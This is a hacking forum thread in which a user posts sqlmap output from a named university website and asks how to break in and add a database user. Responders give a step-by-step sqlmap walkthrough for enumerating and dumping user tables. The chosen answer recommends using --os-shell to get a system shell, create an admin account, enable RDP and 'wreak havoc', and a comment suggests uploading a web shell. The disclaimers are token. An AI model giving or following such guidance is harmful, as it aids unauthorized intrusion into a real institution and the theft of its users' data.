0 votes
139 views
asked in Hacking by
closed by

I found some databases on a website which is under as:

web server operating system: Windows 8 or 2012
web application technology: ASP.NET, ASP, Microsoft IIS 8.0
back-end DBMS: Microsoft SQL Server 2008
available databases [17]:
[*] Admission
[*] LIVE_AIOU
[*] master
[*] model
[*] msdb
[*] OBJ
[*] Online-Admission
[*] Pictures
[*] Queries
[*] ReportServer
[*] ReportServerTempDB
[*] Rollnoslips
[*] STATS
[*] tempdb
[*] Tutor_List
[*] Tutors
[*] UMC

Now i would like to know which database is connected to the webpage (www.aiou.edu.pk/Tutorship.asp).

and how i will hack or edit the database, if i want to add a user in database.

related to an answer for: How to hack DBMS Sql server 2008?
closed with the note: answer selected
commented by

.:: Educational Purpose Only ::.

what is sqlmap?

Sqlmap is one of the most popular and powerful sql injection automation tool out there. Given a vulnerable http request url, sqlmap can exploit the remote database and do a lot of hacking like extracting database names, tables, columns, all the data in the tables etc. It can even read and write files on the remote file system under certain conditions. Written in python it is one of the most powerful hacking tools out there. Sqlmap is the metasploit of sql injections.

Vulnerable Url:

http://www.site.com/section.php?id=51
and it is prone to sql injection because the developer of that site did not properly escape the parameter id. This can be simply tested by trying to open the url
http://www.site.com/section.php?id=51'
Hacking with sqlmap
in console try this
sqlmap -u http://site.com/index.asp?id=765

Discover Databases

Once sqlmap confirms that a remote url is vulnerable to sql injection and is exploitable the next step is to find out the names of the databases that exist on the remote system. The "--dbs" option is used to get the database list.

$ sqlmap  -u "http://www.sitemap.com/section.php?id=51" --dbs

and the result should be 

[12:13:00] [INFO] fetching database names
[12:13:00] [INFO] the SQL query used returns 2 entries
[12:13:00] [INFO] resumed: information_schema
[12:13:00] [INFO] resumed: mywebdb
available databases [2]:
[*] information_schema
[*] mywebdb

Find tables in a particular database

Now its time to find out what tables exist in a particular database. Lets say the database of interest over here is 'mywebdb

sqlmap -u "http://www.site.com/section.php?id=51" --tables -D mywebdb
and the output can be something similar to this
back-end DBMS: MySQL 5
[11:55:18] [INFO] fetching tables for database: 'safecosmetics'
[11:55:19] [INFO] heuristics detected web page charset 'ascii'
[11:55:19] [INFO] the SQL query used returns 216 entries
[11:55:20] [INFO] retrieved: acl_acl
[11:55:21] [INFO] retrieved: acl_acl_sections                                                                                
........... more tables

Get columns of a table

Now that we have the list of tables with us, it would be a good idea to get the columns of some important table. Lets say the table is 'users' and it contains the username and password.

sqlmap  -u "http://www.site.com/section.php?id=51" --columns -D mywebdb -T users

The output can be something like this

[12:17:39] [INFO] fetching columns for table 'users' in database 'safecosmetics'
[12:17:41] [INFO] heuristics detected web page charset 'ascii'
[12:17:41] [INFO] the SQL query used returns 8 entries
[12:17:42] [INFO] retrieved: id
[12:17:43] [INFO] retrieved: int(11)                                                                                         
[12:17:45] [INFO] retrieved: name                                                                                            
[12:17:46] [INFO] retrieved: text                                                                                            
[12:17:47] [INFO] retrieved: password                                                                                        
[12:17:48] [INFO] retrieved: text                                                                                            

.......

[12:17:59] [INFO] retrieved: hash
[12:18:01] [INFO] retrieved: varchar(128)
Database: safecosmetics
Table: users
[8 columns]
+-------------------+--------------+
| Column            | Type         |
+-------------------+--------------+
| email             | text         |
| hash              | varchar(128) |
| id                | int(11)      |
| name              | text         |
| password          | text         |
| permission        | tinyint(4)   |
| system_allow_only | text         |
| system_home       | text         |
+-------------------+--------------+
So now the columns are clearly visible. Good job!

Get data from a table

Now comes the most interesting part, of extracting the data from the table. The command would be

sqlmap -u "http://www.site.com/section.php?id=51" --dump -D mywebdb -T users
The above command will simply dump the data of the particular table, very much like the mysqldump command.
The output might look similar to this
+----+--------------------+-----------+-----------+----------+------------+-------------+-------------------+
| id | hash               | name      | email     | password | permission | system_home | system_allow_only |
+----+--------------------+-----------+-----------+----------+------------+-------------+-------------------+
| 1  | 5DIpzzDHFOwnCvPonu | admin     | <blank>   | <blank>  | 3          | <blank>     | <blank>           |
+----+--------------------+-----------+-----------+----------+------------+-------------+-------------------+
ok we did it,
now you are asking how you will get the exact vuln "id=" yea  scan that site in some automated scanner if they detected a sql injection error then you will get a vulnerable link try on that i hope its might enough.

1 Answer

0 votes
answered by
selected by
 
Best answer

that query has already been answered by  --current-db switch in sqlmap or select db_name() query.

How to Hack a server through its DB a.k.a pwnage 

well , first of all edit your question and hide the website address as we do not promote unauthorized hacking (its baaad) 

as you shared a windows server , although you did not share the connected user but I assume its a SYSTEM account which means that it has admin rights on the server , so there is nothing hard now , is it ? 

just use --os-shell switch in sqlmap to get your self a command console , from there you can add a new user with admin rights , check if RDP is open .. if not open that or even spawn a PowerShell (refer to my powershell archive hacks and techniques ) 

–os-shell: SQLMap will try to get the operating system command shell by exploiting SQL injection

with the above you can wreak havoc

Play Safe

commented by
i give you just an example dear like http://site.com << Your target site /file.php << vulnerable location ?id=1 << vulnerable number

now let me explain it to you

./sqlmap.py -u www.drhack.net/contactus.asp?aid=120 thats all vulnerable path and now comes --current-user it means that current aid --is-dba in full you have to use it like this

./sqlmap.py -u www.drhack.net/contactus.asp?aid=120 --current-user --is-dba

if it gives current user is DBA true than you can upload web shell on that server or site

but you have to put correct path which is vulnerable to sqlerror if its not vulnerable then you can't do anything dear.
commented by
When i type ./sqlmap.py ........ It says no file directory found, it seems that ./sqlmap.py is not installed ??
commented by
How i will come to know that which page.asp is linked connected with which database ? i want to add some data details in a site.com/page.asp?id=555
So what i will do first to login in the database ? Which thing will allow me to login into database and where i can add my own data in a specify id to edit or add.
commented by
when you type ./sqlmap.py it says no file ok,

go for => sqlmap -u http://site.com/page.asp?aid=434 --dbs << try this if it worked then try for --current-user --is-dba
if you want to know which page.asp is linked connected with database then scan full site or server on your b0x now lemme explain you full tut
commented by
Can you give me your e.mail id where i can send you all output data/details.
Welcome to Ask Techie
Ask questions and receive answers from other members of the community. Hacking,Technology,Gaming,Programming and everything to get you going with your Cyber World.

94 questions

100 answers

230 comments

78 users

...